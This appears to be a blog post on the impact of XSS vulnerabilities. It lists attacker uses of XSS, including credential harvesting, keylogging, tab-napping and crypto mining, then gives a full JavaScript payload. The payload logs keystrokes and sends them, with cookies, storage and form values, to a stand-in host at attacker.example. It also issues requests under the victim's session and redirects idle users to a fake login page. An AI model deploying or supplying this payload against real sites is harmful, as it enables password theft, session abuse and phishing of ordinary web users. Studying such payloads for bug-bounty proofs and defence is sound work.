Simply put, XSS is an underrated vulnerability, and there are a couple of reasons for that:
- It’s a client-side vulnerability
- White hats just need that alert() popup for a PoC (most of the time)
- Most black hats don’t know enough JS to make money out of XSS
I mean, you can literally impersonate the user; it’s amazing. There are a lot of things you can do with XSS which will also make you look cool on the internet. I don’t know much, but I have listed a few things here to give you an idea.
- Ad-Jacking – If you manage to get stored XSS on a website, just inject your ads into it to make money 😉
- Click-Jacking – You can create a hidden overlay on the page to hijack the victim’s clicks and make them perform malicious actions.
- Credential Harvesting – The most fun part. You can use a fancy popup to harvest credentials: “WiFi firmware has been updated, please re-enter your credentials to authenticate.”
- Forced Downloads – So the victim isn’t downloading your malicious Flash Player from absolutely-safe.com? Don’t worry, you will have more luck forcing a download from the trusted website your victim is already visiting.
- Crypto Mining – Yes, you can use the victim’s CPU to mine cryptocurrency for you!
- Keylogging – You all know what this is. Every keystroke on the page, passwords included, can be captured and sent off.
- Crashing Browsers – Yes! You can crash browsers by flooding them with… stuff.
- Stealing Information – Grab information from the web page (cookies that aren’t HttpOnly, page content, form values) and send it to your server. Simple!
- Tab-napping – Just a fancy version of redirection. For example, if no keyboard or mouse events have been received for more than a minute, it could mean the user is AFK, and you can sneakily replace the current web page with a fake one.
- Capturing Screenshots – Thanks to HTML5 again, you can now render a screenshot of the web page from inside it. Blind XSS detection tools have been doing this since before it was cool.
- Perform Actions – You are controlling the browser; can’t you feel the power? Got XSS on a social media site? You can send messages, modify information and… you get the idea.
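To make a few of the items above concrete, here is an added example (my own code, not something from the original post) of a small XSS payload that wires together keylogging, stealing page information, performing actions as the victim, and tab-napping. Everything runs inside the victim’s page on the trusted origin, so outgoing requests carry the victim’s cookies and look like first-party traffic. The attacker URLs (`EXFIL_URL`, `FAKE_LOGIN_URL`) are hypothetical, and `makeFakeDocument()` plus the fake send/fetch/timer functions in `demo()` are constructed stand-ins for the browser so the logic can be run offline under Node; in a real injection you would pass `document`, `navigator.sendBeacon.bind(navigator)`, `window.fetch`, `location.replace.bind(location)`, `setTimeout` and `clearTimeout` instead.

```javascript
// Added example, not code from the original post: a minimal XSS payload that wires together
// keylogging, stealing page information, performing actions as the victim, and tab-napping.
//
// Assumptions (labelled): EXFIL_URL and FAKE_LOGIN_URL are hypothetical attacker-controlled
// addresses; makeFakeDocument() and the fake send/fetch/timer functions in demo() are
// constructed stand-ins for the browser so the logic can be exercised offline under Node.

const EXFIL_URL = "https://attacker.example/collect";      // hypothetical
const FAKE_LOGIN_URL = "https://attacker.example/login";   // hypothetical

// Keylogging: buffer keystrokes and flush them in batches so the exfil traffic stays small.
// Non-printable keys are recorded as [Name] so "Enter" and "Tab" remain visible in the log.
function installKeylogger(doc, send, flushEvery = 8) {
  let buf = "";
  const flush = () => {
    if (buf.length === 0) return;
    send(EXFIL_URL, JSON.stringify({ t: "keys", page: String(doc.location), keys: buf }));
    buf = "";
  };
  doc.addEventListener("keydown", (e) => {
    buf += e.key.length === 1 ? e.key : "[" + e.key + "]";
    if (buf.length >= flushEvery) flush();
  });
  return { flush };
}

// Stealing information: everything a same-origin script can read without extra privilege.
// HttpOnly cookies are *not* in doc.cookie, which is why actAsVictim() below still matters.
function stealPageInfo(doc, storage) {
  return {
    cookie: doc.cookie,
    storage: Object.assign({}, storage),
    inputs: doc.querySelectorAll("input").map((i) => ({ name: i.name, value: i.value })),
  };
}

// Performing actions: a same-origin request from inside the page is sent with the victim's
// session (HttpOnly cookies included), so the server sees an ordinary user action.
function actAsVictim(fetchImpl, path, payload) {
  return fetchImpl(path, {
    method: "POST",
    credentials: "same-origin",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify(payload),
  });
}

// Tab-napping: re-arm an idle timer on every keyboard/mouse event; once the victim has been
// AFK for idleMs, swap the page for the fake login page.
function installTabnapper(doc, replaceLocation, setTimer, clearTimer, idleMs = 60000) {
  let timer = null;
  const arm = () => {
    if (timer !== null) clearTimer(timer);
    timer = setTimer(() => replaceLocation(FAKE_LOGIN_URL), idleMs);
  };
  for (const ev of ["keydown", "mousemove", "click"]) doc.addEventListener(ev, arm);
  arm();
}

// Constructed stand-in for the DOM: just enough surface for the functions above.
function makeFakeDocument() {
  const listeners = {};
  return {
    location: "https://bank.example/account",            // constructed victim page
    cookie: "session=abc123",                            // constructed, non-HttpOnly cookie
    inputs: [{ name: "iban", value: "DE00 1234 5678" }], // constructed form field
    addEventListener(name, fn) { (listeners[name] = listeners[name] || []).push(fn); },
    dispatch(name, ev) { for (const fn of listeners[name] || []) fn(ev); },
    querySelectorAll(sel) { return sel === "input" ? this.inputs : []; },
  };
}

// Offline walk-through of the payload against the fake document; returns what left the page.
function demo() {
  const doc = makeFakeDocument();
  const sent = [], requests = [], redirects = [], timers = [];
  const send = (url, body) => sent.push({ url, body: JSON.parse(body) });
  const fakeFetch = (url, opts) => { requests.push({ url, opts }); return Promise.resolve({ ok: true }); };
  const setTimer = (fn, ms) => timers.push({ fn, ms, cleared: false }) - 1; // returns timer id
  const clearTimer = (id) => { timers[id].cleared = true; };

  installKeylogger(doc, send, 4);
  installTabnapper(doc, (u) => redirects.push(u), setTimer, clearTimer, 60000);

  // Victim types a password and hits Enter: "hunt" flushes at 4 chars, "er[Enter]" right after.
  for (const k of ["h", "u", "n", "t", "e", "r", "Enter"]) doc.dispatch("keydown", { key: k });
  send(EXFIL_URL, JSON.stringify(Object.assign({ t: "info" }, stealPageInfo(doc, { theme: "dark" }))));
  actAsVictim(fakeFetch, "/api/messages", { to: "friend", text: "check this link" });

  // Victim goes AFK: the only timer still armed (the one from the last keydown) fires.
  const live = timers.filter((t) => !t.cleared);
  live[live.length - 1].fn();
  return { sent, requests, redirects, armedTimers: live.length };
}

console.log(JSON.stringify(demo(), null, 2));
```

The design point worth noticing is the split between `stealPageInfo()` and `actAsVictim()`: HttpOnly keeps the session cookie out of `document.cookie`, but it does nothing against a script that simply issues requests from inside the page, because the browser attaches the cookie itself. That is why “perform actions” is usually the more damaging primitive, and why a PoC that demonstrates it lands harder than an alert box.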
Next time you find an XSS vulnerability, try submitting an exploit that steals data (or something similar) as the PoC. I am not a bug hunter and I don’t know if that will get you paid more, but I think it should.
Have a nice day, stay hydrated ^_^